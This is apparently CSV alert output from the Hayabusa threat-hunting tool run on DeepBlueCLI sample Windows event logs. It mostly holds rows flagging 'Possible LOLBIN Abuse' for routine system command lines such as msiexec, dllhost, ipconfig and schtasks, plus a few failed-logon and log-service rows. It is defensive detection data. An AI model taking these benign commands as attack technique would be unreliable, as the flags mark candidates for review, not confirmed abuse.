2016-09-03 23:52:34.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:22.275 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:22.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:23.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 00:52:11.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.532 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.692 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:21:44.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:27:33.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:34:52.733 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:34:54.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-04 06:35:14.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-04 06:35:15.773 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:16.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:29.507 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:29.601 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:40.667 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:46.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: 
C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:36:24.719 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:36:26.520 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:48:30.867 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 07:57:17.289 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 07:57:39.909 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 08:03:14.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 08:03:14.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:04.123 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.218 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:15.400 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:23.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:37:56.230 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:37:59.307 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:39:22.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:39:28.137 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-05 00:10:41.119 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-05 00:10:41.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:20.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:20.122 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:21.221 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:21.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:30.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 12:28:48.887 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 12:28:49.170 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:16.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:16.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:25.279 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 00:01:09.025 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 00:01:09.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:09:57.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:09:57.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:28:03.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:28:03.894 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:42.990 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:44.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 
| User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:44.490 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:53.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:17.454 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-18 07:56:46.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public 
